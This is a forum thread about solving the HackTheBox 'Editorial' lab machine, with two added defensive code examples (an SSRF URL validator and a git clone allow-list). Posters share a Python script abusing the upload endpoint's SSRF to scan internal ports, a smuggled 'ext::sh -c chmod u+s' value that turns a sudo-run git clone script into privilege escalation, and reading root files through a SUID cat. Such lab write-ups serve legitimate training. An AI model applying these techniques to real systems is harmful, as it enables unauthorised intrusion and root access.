HTB - Editorial
by paven - Saturday June 15, 2024 at 05:48 PM
#71
(Jun 17, 2024, 04:41 AM)officialspeck Wrote: Nice. Please, any idea on the Skyfall root flag?

https://namiq.net/blog/htb-skyfall-writeup-hackthebox
Reply
#72
(Jun 17, 2024, 06:46 AM)Axura Wrote:
(Jun 16, 2024, 11:46 AM)inactive Wrote:
(Jun 16, 2024, 10:08 AM)macavitysworld Wrote:
(Jun 16, 2024, 09:48 AM)teky Wrote:
(Jun 16, 2024, 08:45 AM)macavitysworld Wrote: Internal scanning reveals port 5000 and the API endpoint.

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here, like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

If you are looking for the API endpoint:

- Add the URL: http://127.0.0.1:5000
- Click preview
- Right-click on the corrupted image preview
- Open it in a new tab, press F12 and check the response in the Network tab
- You can find the endpoint there

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use Burp.

And if you are wondering about the port, it's basic internal network scanning with Burp Suite. You have the option to add a URL on the /upload page.
Do a basic Intruder attack on the port number and check the responses to see if you can find anything odd.
For example: https://prnt.sc/pC17U2iUR75r
Here I have taken the payload as numbers, but you can add your own custom list of ports. If you check the content length, you can see that it is different from the rest of the requests.
Here is how I added the payload position: https://prnt.sc/PN5y1zBMPgv9

Is there a way to scan internal ports automatically? Or is the only way to do it by hand, like checking 80, 22...?
If there is a way, how do you scan?

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
from pwn import log

bar = log.progress("Port Enumeration")

# URLs
base_url = "http://editorial.htb"
upload_url = f"{base_url}/upload-cover"

# Dummy headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
    'Accept': '*/*',
    'Origin': base_url,
    'Referer': f"{base_url}/upload",
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close'
}

# List of common ports for 127.0.0.1
common_ports = [80, 443, 8080, 3306, 8000, 3000, 5000, 5432, 22, 25, 27017, 6379, 9200, 7474]

# Read the dummy cover image once, instead of opening (and never closing) a file handle per request
with open('/home/axura/HTB/editorial/axura.jpg', 'rb') as f:  # change this dummy jpg path
    dummy_image = f.read()

# Port enum
for port in common_ports:
# for port in range(1, 10000):
    bar.status(f"Testing port: {port}")

    # Create the form data; the server fetches 'bookurl' itself, so each request probes one local port
    m = MultipartEncoder(
        fields={
            'bookurl': f'http://127.0.0.1:{port}',
            'bookfile': ('axura.jpg', dummy_image, 'image/jpeg'),
        }
    )

    headers['Content-Type'] = m.content_type

    try:
        response = requests.post(upload_url, headers=headers, data=m)
        # A fetched preview comes back as a stored path rather than the default placeholder image
        if response.status_code == 200 and 'image' not in response.text:
            bar.success(f"Port {port} might be open! Valid response received.")
            print(f"Response URL: {base_url}/{response.text.strip()}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed on port {port}: {str(e)}")

This is another method for advanced users Kappa
Thanks @paw for the rank!!
Reply
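An added defender-side example, not from any post in this thread and not the box's code: the /upload page fetches whatever bookurl it is given, which is what lets the Intruder and script approaches above probe 127.0.0.1 ports. A server-side check like the hypothetical check_book_url below (allow-listed schemes and ports, every resolved address rejected if it is loopback, private or otherwise non-public; CONSTRUCTED_DNS and its hostnames are constructed for offline use) would refuse such requests before any fetch is made:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for the cover-image fetcher behind /upload; not the box's code.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
CONSTRUCTED_DNS = {"editorial.htb": ["10.10.11.20"], "images.example.org": ["93.184.216.34"]}  # constructed, offline only

def constructed_resolver(host, port):
    return CONSTRUCTED_DNS.get(host, [])

def system_resolver(host, port):
    # Real resolution via getaddrinfo; returns the IP strings the fetcher would connect to.
    return [info[4][0] for info in socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)]

def is_public_address(ip_text):
    # Reject loopback, RFC 1918 / ULA, link-local, multicast, reserved and unspecified addresses.
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def check_book_url(url, resolver=system_resolver):
    # Return (ok, reason) for a user-supplied bookurl before the server fetches it.
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:  # stops the http://127.0.0.1:<port> probes before any fetch
        return False, f"port not allowed: {port}"
    try:  # IP literals such as 127.0.0.1 or [::1] need no DNS lookup
        addresses = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        try:
            addresses = resolver(parts.hostname, port)
        except socket.gaierror as exc:
            return False, f"dns failure: {exc}"
    if not addresses:
        return False, "dns failure: no addresses"
    for addr in addresses:  # every answer must be public, not just the first one
        if not is_public_address(addr):
            return False, f"non-public address: {addr}"
    return True, "ok"
```

Because a hostname can resolve differently between this check and the actual fetch, the fetcher should connect to the address that was validated rather than resolving the name a second time.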
#73
(Jun 16, 2024, 11:46 AM)inactive Wrote:
(Jun 16, 2024, 10:08 AM)macavitysworld Wrote:
(Jun 16, 2024, 09:48 AM)teky Wrote:
(Jun 16, 2024, 08:45 AM)macavitysworld Wrote:
(Jun 16, 2024, 08:37 AM)ARhOmOuTEd Wrote: How do you know that port 5000 is open on the inside of the box?
Where did you find the API?

Internal scanning reveals port 5000 and the API endpoint.

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b

Where do you find it? Is it here, like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

If you are looking for the API endpoint:

- Add the URL: http://127.0.0.1:5000
- Click preview
- Right-click on the corrupted image preview
- Open it in a new tab, press F12 and check the response in the Network tab
- You can find the endpoint there

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use Burp.

And if you are wondering about the port, it's basic internal network scanning with Burp Suite. You have the option to add a URL on the /upload page.
Do a basic Intruder attack on the port number and check the responses to see if you can find anything odd.
For example: https://prnt.sc/pC17U2iUR75r
Here I have taken the payload as numbers, but you can add your own custom list of ports. If you check the content length, you can see that it is different from the rest of the requests.
Here is how I added the payload position: https://prnt.sc/PN5y1zBMPgv9

Is there a way to scan internal ports automatically? Or is the only way to do it by hand, like checking 80, 22...?
If there is a way, how do you scan?

netstat -tulnp
Reply
#74
Really enjoying following this thread. It's a great chance to learn how different people approach problems. The diversity in problem-solving methods is so interesting and educational. Keep up the great work!
Reply
#75
Can somebody explain to me why I have this error?
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c chmod%u+s%/tmp/priv.sh new_changes
  stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.
Reply
#76
(Jun 21, 2024, 02:31 PM)simple_user Wrote: Can somebody explain to me why I have this error?
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c chmod%u+s%/tmp/priv.sh new_changes
  stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.

If the directory new_changes exists, execute:
rm -rf /opt/internal_apps/clone_changes/new_changes
and then:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% u+s% /tmp/priv.sh'
Reply
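An added defender-side example, not from any post in this thread and not the box's script: the traceback above shows clone_prod_change.py taking its clone URL from argv and passing -c protocol.ext.allow=always, which is what turns an ext:: helper string into a command run under the sudo rule. The hypothetical validate_clone_url and hardened_clone_options below (the allow-listed host is a constructed placeholder) show the two controls that close this: an allow-list on the URL, and git's protocol.allow policy set to deny every transport except https and ssh:

```python
import shlex
from urllib.parse import urlsplit

# Hypothetical allow-list for a clone-from-argv helper like clone_prod_change.py; not the box's code.
ALLOWED_GIT_SCHEMES = {"https", "ssh"}
ALLOWED_GIT_HOSTS = {"git.internal.example"}  # constructed placeholder host

def hardened_clone_options():
    # Deny every transport by default, then re-enable only https and ssh.
    # protocol.ext.allow is not touched, so it keeps git's default of 'never'.
    return ["-c protocol.allow=never",
            "-c protocol.https.allow=always",
            "-c protocol.ssh.allow=always"]

def validate_clone_url(url):
    # Return url if it is an https/ssh URL to an allow-listed host, else raise ValueError.
    # Remote-helper syntax (ext::, fd::) parses as scheme 'ext'/'fd', and scp-like
    # user@host:path parses with no scheme at all, so both fail the allow-list.
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_GIT_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.hostname not in ALLOWED_GIT_HOSTS:
        raise ValueError(f"host not allowed: {parts.hostname!r}")
    return url

def is_clone_url_allowed(url):
    try:
        validate_clone_url(url)
        return True
    except ValueError:
        return False

def clone_argv(url, dest):
    # argv equivalent of GitPython's Repo.clone_from(url, dest, multi_options=hardened_clone_options()),
    # which joins and shlex-splits multi_options the same way before invoking git.
    argv = ["git", "clone", "-v"]
    for opt in hardened_clone_options():
        argv.extend(shlex.split(opt))
    argv.extend([validate_clone_url(url), dest])
    return argv
```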
#77
(Jun 22, 2024, 06:42 AM)imassxck Wrote:
(Jun 21, 2024, 02:31 PM)simple_user Wrote: Can somebody explain to me why I have this error?
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c chmod%u+s%/tmp/priv.sh new_changes
  stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.

If the directory new_changes exists, execute:
rm -rf /opt/internal_apps/clone_changes/new_changes
and then:
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% u+s% /tmp/priv.sh'

Thanks
Reply
#78
thx dude, thx for sharing
Reply
#79
If you only want the flag:
I got cat as SUID (but I guess someone did it before me with prod),
so use GTFOBins
https://gtfobins.github.io/gtfobins/cat/
and run

LFILE=/root/root.txt
cat "$LFILE"
Always worth the check.
Reply

